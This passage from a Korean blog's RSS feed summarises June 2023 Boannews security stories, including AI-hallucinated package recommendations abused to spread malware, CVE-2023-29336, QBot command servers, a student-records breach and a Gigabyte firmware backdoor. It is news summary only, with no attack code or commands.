data-origin-height=&quot;1014&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: #0db4a0;&quot;&gt;기사요약&lt;/span&gt; :&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;생성형 인공지능 챗GPT를 통해 가짜 정보를 생성하려는 특성을 활용하여 챗GPT가 추천할 만한 패키지를 실제로 만든 후에 기다리다 챗GPT의 추천을 받은 개발자가 해당 패키지를 이용하면서 멀웨어 개발에 이용될 수 있다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;- 챗GPT 알고리즘을 훈련 떄 사용했던 데이터가 오래되거나 부정확한 정보 섞일 시 → 부정확한 정보 파악어려움&lt;br&gt;&lt;br&gt;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 챗GPT의 가짜 정보 생성 기능, 멀웨어 개발에 악용된다, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118958&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118958&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;챗GPT의 가짜 정보 생성 기능, 멀웨어 개발에 악용된다&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;보안 외신 핵리드에 의하면 생성형 인공지능 모델인 챗GPT를 활용해 악성 코드를 개발하는 방법이 새롭게 발견됐다고 한다. 챗GPT는 가짜 정보를 생성하려는 특성을 가지고 있는데, 이를 공격자&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;http://m.boannews.com/html/detail.html?idx=118958&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bsR8QZ/hySW0sssfh/q6IMdClXp4fmDfwo6NQl5k/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=118958&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=118958&quot; target=&quot;_blank&quot; data-source-url=&quot;http://m.boannews.com/html/detail.html?idx=118958&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bsR8QZ/hySW0sssfh/q6IMdClXp4fmDfwo6NQl5k/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;챗GPT의 가짜 정보 생성 기능, 멀웨어 개발에 악용된다&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;보안 외신 핵리드에 의하면 생성형 인공지능 모델인 챗GPT를 활용해 악성 코드를 개발하는 방법이 새롭게 발견됐다고 한다. 챗GPT는 가짜 정보를 생성하려는 특성을 가지고 있는데, 이를 공격자&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/645</guid>
      <comments>https://jennana.tistory.com/645#entry645comment</comments>
      <pubDate>Sun, 11 Jun 2023 23:51:53 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 해커들이 익스플로잇 하고 있던 윈도 취약점, 세부 내용 공개돼</title>
      <link>https://jennana.tistory.com/644</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;547&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wX60r/btsjpEX33LL/aG1q6JBUM9DjxMrsKhBhKK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wX60r/btsjpEX33LL/aG1q6JBUM9DjxMrsKhBhKK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wX60r/btsjpEX33LL/aG1q6JBUM9DjxMrsKhBhKK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwX60r%2FbtsjpEX33LL%2FaG1q6JBUM9DjxMrsKhBhKK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;547&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;547&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;그동안 해커들이 사용하는 MS 윈도우 취약점인 Win32k 커널 모드 드러이버를 이용해 권한상승을 하는 취약점이 정기패치로 패치되었지만 아직 정확한 피해 규모는 집계되지 않았다고 한다.&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;- 취약점 번호 : CVE-2023-29336&lt;br&gt;- CVSS 점수 : 7.8 (고위험군)&lt;br&gt;- 패치 적용 : 지난달 정기 패치일&lt;br&gt;* Win32k를 이용한 취약점이 종종 나오고, 공격자글 또한 자주 노린다고 한다.&lt;br&gt;- 해당 취약점은 Winows11에는 작동하지 않음&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 해커들이 익스플로잇 하고 있던 윈도 취약점, 세부 내용 공개돼, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118957&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118957&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;해커들이 익스플로잇 하고 있던 윈도 취약점, 세부 내용 공개돼&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;보안 외신 해커뉴스에 의하면 MS 윈도의 취약점에 대한 익스플로잇 기법이 상세히 공개됐다고 한다. 원래부터 공격자들이 익스플로잇 하고 있었으며, 이에 MS가 패치를 통해 해결한 권한 상승 취&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118957&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/ccA9Bx/hySW7xpvop/VQjvikGKPoGEeyAfzDDsI1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=118957&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=118957&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118957&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/ccA9Bx/hySW7xpvop/VQjvikGKPoGEeyAfzDDsI1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;해커들이 익스플로잇 하고 있던 윈도 취약점, 세부 내용 공개돼&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;보안 외신 해커뉴스에 의하면 MS 윈도의 취약점에 대한 익스플로잇 기법이 상세히 공개됐다고 한다. 원래부터 공격자들이 익스플로잇 하고 있었으며, 이에 MS가 패치를 통해 해결한 권한 상승 취&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;분석 보고서 : &lt;a href=&quot;https://www.numencyber.com/cve-2023-29336-win32k-analysis/&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.numencyber.com/cve-2023-29336-win32k-analysis/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;Analysis of CVE-2023-29336 Win32k Privilege Escalation&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;Analyzing CVE-2023-29336 Win32k vulnerability, its exploitation, and mitigation measures in the context of evolving security practices.&quot; data-og-host=&quot;www.numencyber.com&quot; data-og-source-url=&quot;https://www.numencyber.com/cve-2023-29336-win32k-analysis/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/brUSMz/hySXcrXg0S/VtF7WGkk3RmSAqYcU9aLgK/img.png?width=1800&amp;amp;height=1005&amp;amp;face=0_0_1800_1005&quot; data-og-url=&quot;https://www.numencyber.com/cve-2023-29336-win32k-analysis/&quot;&gt;&lt;a href=&quot;https://www.numencyber.com/cve-2023-29336-win32k-analysis/&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.numencyber.com/cve-2023-29336-win32k-analysis/&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/brUSMz/hySXcrXg0S/VtF7WGkk3RmSAqYcU9aLgK/img.png?width=1800&amp;amp;height=1005&amp;amp;face=0_0_1800_1005')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;Analysis of CVE-2023-29336 Win32k Privilege Escalation&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;Analyzing CVE-2023-29336 Win32k vulnerability, its exploitation, and mitigation measures in the context of evolving security practices.&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.numencyber.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/644</guid>
      <comments>https://jennana.tistory.com/644#entry644comment</comments>
      <pubDate>Sat, 10 Jun 2023 19:19:50 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 하루살이 전략으로 선회하고 있는 큐봇, 잠자는 시간도 늘려</title>
      <link>https://jennana.tistory.com/642</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;큐봇(QBot)이라는 멀웨어의 C2서버들 중 1/4은 하루 동안만 유지되고, 하루 이상 유지되는 서버들 중에서도 50%는 일주일 넘게 비활성화 된 상태라고 한다. 큐봇이 유명해지고 탐지율이 늘어남에 따라 탐지와 추적이 어렵게 하는 전략을 채택하면서 그렇다고 한다.&lt;br&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;- 큐봇 : 칵봇(QakBot)이라고도 불리며 뱅킹 트로이목마 형태로 처음 등장. 현재는 다운로더로 많이 활용.&lt;br&gt;- 해당 악성코드는 스피어 피싱 이메일을 통해서 전달.&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 하루살이 전략으로 선회하고 있는 큐봇, 잠자는 시간도 늘려, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=118749&amp;amp;page=1&amp;amp;kind=1&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=118749&amp;amp;page=1&amp;amp;kind=1&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;하루살이 전략으로 선회하고 있는 큐봇, 잠자는 시간도 늘려&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;보안 외신 해커뉴스에 의하면 큐봇(QBot)이라는 멀웨어의 C&amp;amp;C 서버들 중 1/4이 단 하루 동안만 유지된다고 한다. 게다가 하루 이상 가는 서버들 중 50%는 일주일 넘게 비활성화 된 상태로 유지되는 &quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118749&amp;amp;page=1&amp;amp;kind=1&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/eiO8IL/hySQGuqErE/sARuFJYQzy7qz7D6BeJAJ1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=118749&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=118749&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118749&amp;amp;page=1&amp;amp;kind=1&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/eiO8IL/hySQGuqErE/sARuFJYQzy7qz7D6BeJAJ1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;하루살이 전략으로 선회하고 있는 큐봇, 잠자는 시간도 늘려&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;보안 외신 해커뉴스에 의하면 큐봇(QBot)이라는 멀웨어의 C&amp;amp;C 서버들 중 1/4이 단 하루 동안만 유지된다고 한다. 게다가 하루 이상 가는 서버들 중 50%는 일주일 넘게 비활성화 된 상태로 유지되는 &lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/642</guid>
      <comments>https://jennana.tistory.com/642#entry642comment</comments>
      <pubDate>Sun, 4 Jun 2023 22:38:24 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] &amp;lsquo;전국연합학력평가&amp;rsquo; 성적 유출 해킹범 추적 끝 총 9명 검거... 2명은 구속</title>
      <link>https://jennana.tistory.com/641</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;20230606_022112.jpg&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;496&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dri8qr/btsiJ7ONFh9/gK1P64kxauGq10erEDDKdk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dri8qr/btsiJ7ONFh9/gK1P64kxauGq10erEDDKdk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dri8qr/btsiJ7ONFh9/gK1P64kxauGq10erEDDKdk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdri8qr%2FbtsiJ7ONFh9%2FgK1P64kxauGq10erEDDKdk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;496&quot; data-filename=&quot;20230606_022112.jpg&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;496&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0db4a0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;경찰청에 따르면 2월 경기도교육청 학력평가시스템 서버에 불법 침입하여 지난해 11월 실시한 전국연합학력평가에서 고등학교 2학년 성적정보 27만여 건을 탈취 후 텔레그램 채널 관리자에게 전달한 해커가 지난달 26일 검거 및 구속했으며, 해킹 관련자 총 9명 전원이 검거되었다.&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;- 우회를 위해 해외 IP 사용.&lt;br /&gt;- 탈취 정보를 텔레그램 관리자에게 전달 후 탈퇴&lt;br /&gt;- 유출경로 분석하여 해커 특정&lt;br /&gt;- 서버 취약점을 우연히 발결 후 실력 과시용으로 전달&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size14&quot;&gt;김영명 기자, &amp;lsquo;전국연합학력평가&amp;rsquo; 성적 유출 해킹범 추적 끝 총 9명 검거... 2명은 구속, 보안뉴스,&lt;br /&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=118714&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=118714&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;&amp;lsquo;전국연합학력평가&amp;rsquo; 성적 유출 해킹범 추적 끝 총 9명 검거... 2명은 구속&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;경기남부경찰청(청장 홍기현) 사이버수사과는 올해 2월 경기도교육청 학력평가시스템 서버에 불법 침입해 지난해 11월 전국연합학력평가 고등학교 2학년 성적정보 27만여건을 탈취한 후, 텔레그&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118714&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bWbNDg/hySQLWFelA/FoHppyxJ0i1vQJQjhI5xs1/img.jpg?width=750&amp;amp;height=501&amp;amp;face=0_0_750_501&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=118714&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=118714&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118714&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bWbNDg/hySQLWFelA/FoHppyxJ0i1vQJQjhI5xs1/img.jpg?width=750&amp;amp;height=501&amp;amp;face=0_0_750_501');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;&amp;lsquo;전국연합학력평가&amp;rsquo; 성적 유출 해킹범 추적 끝 총 9명 검거... 2명은 구속&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;경기남부경찰청(청장 홍기현) 사이버수사과는 올해 2월 경기도교육청 학력평가시스템 서버에 불법 침입해 지난해 11월 전국연합학력평가 고등학교 2학년 성적정보 27만여건을 탈취한 후, 텔레그&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/641</guid>
      <comments>https://jennana.tistory.com/641#entry641comment</comments>
      <pubDate>Fri, 2 Jun 2023 22:17:26 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 기가바이트의 PC 일부에서 백도어와 비슷한 기능 발견돼</title>
      <link>https://jennana.tistory.com/640</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;624&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zYuOt/btsijYqL4k3/039PW5or5EGvcOgmVaTHW1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zYuOt/btsijYqL4k3/039PW5or5EGvcOgmVaTHW1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zYuOt/btsijYqL4k3/039PW5or5EGvcOgmVaTHW1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzYuOt%2FbtsijYqL4k3%2F039PW5or5EGvcOgmVaTHW1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;624&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;624&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;기가바이트(Gigabyte)에서 만든 시스템에서 백도어와 비슷한 기능이 발견되어서 사용자들의 보안조치가 필요하다. 해당 기가바이트 제품이 탑재된 펌웨어 장비가 부팅시에 최신의 윈도 파일을 심고, 이 파일이 추가적인 페이로드를 다운하고 실행하는 기능이 심겨져 있음. 이로 인해 사용자들 모르게 악성코드가 심겨질수 있으며 해당 윈도우 파일은 닷넷 기반이며 아직 모든 PC에 펌웨어 업데이트가 개발되지 않았다고 한다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;- 해당 취약점 위험이 있는 장비 : 기가바이트의 271개의 마더보드(인텔, AMD 칩셋 포함)&lt;br&gt;- 가장 큰 문제 : 마더보드 펌웨어에 업데이트 프로그램이 있기 때문에 소비자는 쉽제 지울 수 없음.&lt;br&gt;&lt;br&gt;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 기가바이트의 PC 일부에서 백도어와 비슷한 기능 발견돼, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118702&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118702&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;기가바이트의 PC 일부에서 백도어와 비슷한 기능 발견돼&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;보안 블로그 시큐리티어페어즈에 의하면 기가바이트(Gigabyte)에서 만든 시스템 일부에서 백도어와 같은 기능이 숨겨져 있다가 발견됐다고 한다. 기가바이트 제품에 탑재된 펌웨어가 장비 부팅 &quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118702&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bIfk4C/hySQLuBOMB/IumZYIaoDX8al7UX9Nqjwk/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=118702&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=118702&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=6&amp;amp;tab_type=&amp;amp;idx=118702&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bIfk4C/hySQLuBOMB/IumZYIaoDX8al7UX9Nqjwk/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;기가바이트의 PC 일부에서 백도어와 비슷한 기능 발견돼&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;보안 블로그 시큐리티어페어즈에 의하면 기가바이트(Gigabyte)에서 만든 시스템 일부에서 백도어와 같은 기능이 숨겨져 있다가 발견됐다고 한다. 기가바이트 제품에 탑재된 펌웨어가 장비 부팅 &lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://www.tomshardware.com/news/gigabyte-motherboards-come-with-a-firmware-backdoor&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.tomshardware.com/news/gigabyte-motherboards-come-with-a-firmware-backdoor&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;Firmware Backdoor Discovered in Gigabyte Motherboards, 250+ Models Affected&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;There are ways to protect yourself now and researchers are working to fix it.&quot; data-og-host=&quot;www.tomshardware.com&quot; data-og-source-url=&quot;https://www.tomshardware.com/news/gigabyte-motherboards-come-with-a-firmware-backdoor&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bEfYLr/hySPiHBELa/OEt9Le0P4fEklTy5q8hUDk/img.jpg?width=1200&amp;amp;height=675&amp;amp;face=0_0_1200_675&quot; data-og-url=&quot;https://www.tomshardware.com/news/gigabyte-motherboards-come-with-a-firmware-backdoor&quot;&gt;&lt;a href=&quot;https://www.tomshardware.com/news/gigabyte-motherboards-come-with-a-firmware-backdoor&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.tomshardware.com/news/gigabyte-motherboards-come-with-a-firmware-backdoor&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bEfYLr/hySPiHBELa/OEt9Le0P4fEklTy5q8hUDk/img.jpg?width=1200&amp;amp;height=675&amp;amp;face=0_0_1200_675')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;Firmware Backdoor Discovered in Gigabyte Motherboards, 250+ Models Affected&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;There are ways to protect yourself now and researchers are working to fix it.&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.tomshardware.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; 